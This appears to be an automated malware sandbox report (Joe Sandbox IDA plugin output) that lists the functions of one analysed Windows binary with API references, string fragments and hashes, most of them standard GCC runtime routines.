Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: strlen$CaptureContextUnwindabortmalloc
String ID: basic_string::_M_create
API String ID: 214865124-3122258987
Opcode ID: 07c73089a9c23fa8787c8356b327776d2c61bf32108450415a4ed1dc3e9e7dc6
Instruction ID: 63a5b0c08484df1ee21450809dad2805974c806c228e544c41d4a9b1efb3c52d
Opcode Fuzzy Hash: 07c73089a9c23fa8787c8356b327776d2c61bf32108450415a4ed1dc3e9e7dc6
Instruction Fuzzy Hash: 4F11FE55E2919774E948BA626C151BAD262BF4EBC5FC02431EC4D5B343DD3DE00CA3A9

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D94C80 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae371a8610d859356a0b0e471f64f9d264ed4058a6e4d7a127b9e3f5264a2ab
Instruction ID: 5311d38952ff0d1469aed6883e4e63648ac88199e93e987a1e62260905384bbc
Opcode Fuzzy Hash: dae371a8610d859356a0b0e471f64f9d264ed4058a6e4d7a127b9e3f5264a2ab
Instruction Fuzzy Hash: FEE09A76A08B8191C214EF56F49045EB775F7997C4B504925EECC53B2ACF3CD1508F50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB3230 Relevance: 63.2, APIs: 13, Strings: 23, Instructions: 184fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF738DB33AF
fwrite.MSVCRT ref: 00007FF738DB34D0

Part of subcall function 00007FF738D9E1F0: strlen.MSVCRT ref: 00007FF738D9E27E
Part of subcall function 00007FF738D9E1F0: memcpy.MSVCRT ref: 00007FF738D9E292
Part of subcall function 00007FF738D9E1F0: free.MSVCRT ref: 00007FF738D9E29D

fwrite.MSVCRT ref: 00007FF738DB344C
fputs.MSVCRT ref: 00007FF738DB3466
fwrite.MSVCRT ref: 00007FF738DB3487
free.MSVCRT ref: 00007FF738DB3497
fputs.MSVCRT ref: 00007FF738DB34A9
abort.MSVCRT ref: 00007FF738DB34D5
fwrite.MSVCRT ref: 00007FF738DB34FA
abort.MSVCRT ref: 00007FF738DB34FF
fwrite.MSVCRT ref: 00007FF738DB353A
fputs.MSVCRT ref: 00007FF738DB354C
fputc.MSVCRT ref: 00007FF738DB3560

Strings

port at , xrefs: 00007FF738DB334C
not enou, xrefs: 00007FF738DB3253
https://, xrefs: 00007FF738DB333D
lease su, xrefs: 00007FF738DB3285
l bug re, xrefs: 00007FF738DB3249
bmit ful, xrefs: 00007FF738DB3296
port at , xrefs: 00007FF738DB32B1
gcc.gnu., xrefs: 00007FF738DB336A
https://, xrefs: 00007FF738DB32A0
mat expa, xrefs: 00007FF738DB3271
org/bugs, xrefs: 00007FF738DB335B
l bug re, xrefs: 00007FF738DB3319
/): , xrefs: 00007FF738DB32E3
gh space, xrefs: 00007FF738DB325D
terminate called recursively, xrefs: 00007FF738DB34F0
terminate called after throwing an instance of ', xrefs: 00007FF738DB343C
org/bugs, xrefs: 00007FF738DB32D5
gcc.gnu., xrefs: 00007FF738DB32C3
for for, xrefs: 00007FF738DB3267
what(): , xrefs: 00007FF738DB3533
nsion (P, xrefs: 00007FF738DB327B
terminate called without an active exception, xrefs: 00007FF738DB34C6
bmit ful, xrefs: 00007FF738DB3329

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: fwrite$fputs$abortfreememcpy$fputcstrlen
String ID: what(): $ for for$/): $bmit ful$bmit ful$gcc.gnu.$gcc.gnu.$gh space$https://$https://$l bug re$l bug re$lease su$mat expa$not enou$nsion (P$org/bugs$org/bugs$port at $port at $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 1586115568-1351603976
Opcode ID: fe6879b4978ab91ad2477e5e00425517d39e91c0031cd86db954f8b7f250dbe4
Instruction ID: 5f316f508ce1bb68dbddebe2af08d1eb1c136e36b0f0d4826cb186848a7b84a5
Opcode Fuzzy Hash: fe6879b4978ab91ad2477e5e00425517d39e91c0031cd86db954f8b7f250dbe4
Instruction Fuzzy Hash: A2712722B1874265EB11BBA2A8413ADF3B5FB89B80FD44138ED8D47B86DE3DD004E715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9F840 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 157synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF738D9F848
CreateMutexA.KERNEL32 ref: 00007FF738D9F957
WaitForSingleObject.KERNEL32 ref: 00007FF738D9F968
FindAtomA.KERNEL32 ref: 00007FF738D9F97D
AddAtomA.KERNEL32 ref: 00007FF738D9F9BD
_onexit.MSVCRT ref: 00007FF738D9F9DA
ReleaseMutex.KERNEL32 ref: 00007FF738D9F9E2
CloseHandle.KERNEL32 ref: 00007FF738D9F9EB

Strings

failed to get string from atom, xrefs: 00007FF738D9FAD6
failed to to lock creation mutex, xrefs: 00007FF738D9FAB6
failed to add string to atom table, xrefs: 00007FF738D9FAA3
aaaaaaaa, xrefs: 00007FF738D9F8F4
aaaaaaaa, xrefs: 00007FF738D9F8FE
__eh_shmem3_gcc_tdm_, xrefs: 00007FF738D9F897, 00007FF738D9F8C7

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
String ID: __eh_shmem3_gcc_tdm_$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2382646235-4003979217
Opcode ID: eeefa348b6469097a2ce0c1b6ef4fcb7977b54c7f9b7813c6b328c0e60a68bab
Instruction ID: ae4a045621c653a2e8dcef23c3ad18bc310052eb6d8a3fcde563f8cdc50b923e
Opcode Fuzzy Hash: eeefa348b6469097a2ce0c1b6ef4fcb7977b54c7f9b7813c6b328c0e60a68bab
Instruction Fuzzy Hash: F76191B6E2CA43B2EB40AF15E8152B5E3A2BF48785FC48031C54D462A4EE7DE549F324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9FC40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF738D9FD13
abort.MSVCRT(?,?,?,?,?,?,00000000,00000001,?,?,00000060,?,00007FF738DC21C5), ref: 00007FF738D9FD19
RtlUnwindEx.KERNEL32 ref: 00007FF738D9FE2C

Strings

CCG!, xrefs: 00007FF738D9FD01
CCG!, xrefs: 00007FF738D9FC69
CCG", xrefs: 00007FF738D9FCA1
CCG , xrefs: 00007FF738D9FCAD

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: 5a5515d5399e8932a17ee12ba86523fad0d7272596fb782806b5c41e63c3ad30
Instruction ID: 0995aed03536fc93021fc16ee07103e530b19d9fc6b4a126fa68d770e5111912
Opcode Fuzzy Hash: 5a5515d5399e8932a17ee12ba86523fad0d7272596fb782806b5c41e63c3ad30
Instruction Fuzzy Hash: 6651BB33618B8096D7609F55F8806ADB3B4F788B98FA04136EE8D07B58CF3AC895C744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA2220 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 51threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF738DA22CD
_ultoa.MSVCRT ref: 00007FF738DA22E0
OutputDebugStringA.KERNEL32 ref: 00007FF738DA2327
abort.MSVCRT ref: 00007FF738DA232D

Strings

eaning u, xrefs: 00007FF738DA2231
eys for , xrefs: 00007FF738DA224F
thread , xrefs: 00007FF738DA225E
Error cl, xrefs: 00007FF738DA2227
p spin_k, xrefs: 00007FF738DA2240

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CurrentDebugOutputStringThread_ultoaabort
String ID: Error cl$eaning u$eys for $p spin_k$thread
API String ID: 4191895893-3545615192
Opcode ID: 5e02075398575467d757778500d00e02b97ceec7ff2355a5d38304a33f0ea4e3
Instruction ID: 33c760d37e1d3d5db89020f672abcc66002476a38f2417571e70259cd7938612
Opcode Fuzzy Hash: 5e02075398575467d757778500d00e02b97ceec7ff2355a5d38304a33f0ea4e3
Instruction Fuzzy Hash: A321747261CB8191E7609B29F05432EF6E2F786744FA08138E2CD4BB98DF7ED4588B15

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D9F750 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32 ref: 00007FF738D9F761
WaitForSingleObject.KERNEL32 ref: 00007FF738D9F772
FindAtomA.KERNEL32 ref: 00007FF738D9F7DF
ReleaseMutex.KERNEL32 ref: 00007FF738D9F7ED
CloseHandle.KERNEL32 ref: 00007FF738D9F7F6
CloseHandle.KERNEL32 ref: 00007FF738D9F817

Strings

failed to to lock cleanup mutex, xrefs: 00007FF738D9F808

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
String ID: failed to to lock cleanup mutex
API String ID: 3776795807-674698732
Opcode ID: 71f342f9f933a52b181f13a2de0319036eade7889627a245c740d797601e7c04
Instruction ID: aca9d070e391b663a049d11f18e2495f5140127dbd5082a202c1fdc738342425
Opcode Fuzzy Hash: 71f342f9f933a52b181f13a2de0319036eade7889627a245c740d797601e7c04
Instruction Fuzzy Hash: 2E215AA2A1DA03B1EE54BF55D854175E3A2BF48B95BC49435C80D4B3A0DE3CE895E324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBDEF0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 196COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF738DBDF96
memcpy.MSVCRT ref: 00007FF738DBDFC1
memcpy.MSVCRT ref: 00007FF738DBE030
memcpy.MSVCRT ref: 00007FF738DBE06E
memcpy.MSVCRT ref: 00007FF738DBE0BF

Strings

basic_string::_M_replace, xrefs: 00007FF738DBE1DE

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: 83352c911b5e7a670d2c16afee725c69e32d097fda13c06022162402ec47247e
Instruction ID: 79244d9bcd778160af9d2de8a10fa6485bf4455fb27cd4bc7984e0fe81264eec
Opcode Fuzzy Hash: 83352c911b5e7a670d2c16afee725c69e32d097fda13c06022162402ec47247e
Instruction Fuzzy Hash: CF710323E2DA96B1E916EF11C0045B9E754AB0CBC0FD84532EA1E477D4DE3EE449E328

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DBAE20 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF738DBAEC5
memcpy.MSVCRT ref: 00007FF738DBAEF0
memcpy.MSVCRT ref: 00007FF738DBAF59
memcpy.MSVCRT ref: 00007FF738DBAF8D
memcpy.MSVCRT ref: 00007FF738DBAFD9

Strings

basic_string::_M_replace, xrefs: 00007FF738DBB0E1

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy
String ID: basic_string::_M_replace
API String ID: 3510742995-2323331477
Opcode ID: 6e4ccbe5bf110cb7a92f3fabf76553f9e581279dc44f1e42f5d797bc024edc43
Instruction ID: eb9d6f22091fa16596376bc151a1ffac3bfd6cd6842f3154bc3e9cf9eda466ae
Opcode Fuzzy Hash: 6e4ccbe5bf110cb7a92f3fabf76553f9e581279dc44f1e42f5d797bc024edc43
Instruction Fuzzy Hash: 38610323E2E696B5E923AA1580006B8EB549B1ABC0FD84132DA6C177C2DD3FD449A324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA5AE0 Relevance: 13.7, APIs: 9, Instructions: 182threadinjectionsynchronizationCOMMON

Download Yara Rule

APIs

GetHandleInformation.KERNEL32 ref: 00007FF738DA5B1B

Part of subcall function 00007FF738DA2D40: TlsGetValue.KERNEL32 ref: 00007FF738DA2DA0

SetEvent.KERNEL32 ref: 00007FF738DA5BA2
SuspendThread.KERNEL32 ref: 00007FF738DA5BFC
WaitForSingleObject.KERNEL32 ref: 00007FF738DA5C08
GetThreadContext.KERNEL32 ref: 00007FF738DA5C1C
SetThreadContext.KERNEL32 ref: 00007FF738DA5C38
SetEvent.KERNEL32 ref: 00007FF738DA5C7E
ResumeThread.KERNEL32 ref: 00007FF738DA5C90
SetEvent.KERNEL32 ref: 00007FF738DA5CE3

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Thread$Event$Context$HandleInformationObjectResumeSingleSuspendValueWait
String ID:
API String ID: 2335333592-0
Opcode ID: c0454334065818ad910fe9271c82020997dc8f7e4f5c5ab4ac494b7568ff68ad
Instruction ID: 943f76dd058cb34f0198f1da7c758ba6003d988ee5dfb11ecabe30b9cb394ded
Opcode Fuzzy Hash: c0454334065818ad910fe9271c82020997dc8f7e4f5c5ab4ac494b7568ff68ad
Instruction Fuzzy Hash: D181AF63A19602A1EA54BF65D444378E7B1FF48B94FE44531CA1C0B394DF3EE888E368

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DB7980 Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 177COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF738DB79C7
memcpy.MSVCRT ref: 00007FF738DB7BB9

Part of subcall function 00007FF738DB8580: memcpy.MSVCRT ref: 00007FF738DB85FB

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF738DB7CB9
basic_string::insert, xrefs: 00007FF738DB7CA3, 00007FF738DB7CB2
basic_string::_M_replace_aux, xrefs: 00007FF738DB79EF

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy$memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 438689982-1339558951
Opcode ID: 2aa7705d7efa051678438d68cb09cc562f26b0b831d3bb896a7316ff393a9a71
Instruction ID: 48f137f7bbbde0111cc784f2f0eab99b8c78c6b7839c516244d65aa9d96004bf
Opcode Fuzzy Hash: 2aa7705d7efa051678438d68cb09cc562f26b0b831d3bb896a7316ff393a9a71
Instruction Fuzzy Hash: 51510353B2929673EE137A6688000B9D2509F0DFD4FD84532DE1C17392DD3EE98AE328

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA91C0 Relevance: 13.6, APIs: 9, Instructions: 129COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF738DA9120: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF738DA9749), ref: 00007FF738DA9146
Part of subcall function 00007FF738DA9120: LeaveCriticalSection.KERNEL32(?,00007FF738DA9749,?,?,?,?,?,?,?,?,?,?,?,00007FF739051400,?), ref: 00007FF738DA916B

TryEnterCriticalSection.KERNEL32 ref: 00007FF738DA9233
CloseHandle.KERNEL32 ref: 00007FF738DA927F
CloseHandle.KERNEL32 ref: 00007FF738DA9289
LeaveCriticalSection.KERNEL32 ref: 00007FF738DA928E
DeleteCriticalSection.KERNEL32 ref: 00007FF738DA929E
DeleteCriticalSection.KERNEL32 ref: 00007FF738DA92A3
DeleteCriticalSection.KERNEL32 ref: 00007FF738DA92AA
free.MSVCRT ref: 00007FF738DA92AF
LeaveCriticalSection.KERNEL32 ref: 00007FF738DA93B1

Part of subcall function 00007FF738DA8880: EnterCriticalSection.KERNEL32 ref: 00007FF738DA8898
Part of subcall function 00007FF738DA8880: ReleaseSemaphore.KERNEL32 ref: 00007FF738DA88C6
Part of subcall function 00007FF738DA8880: LeaveCriticalSection.KERNEL32 ref: 00007FF738DA88D3

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CriticalSection$Leave$DeleteEnter$CloseHandle$ReleaseSemaphorefree
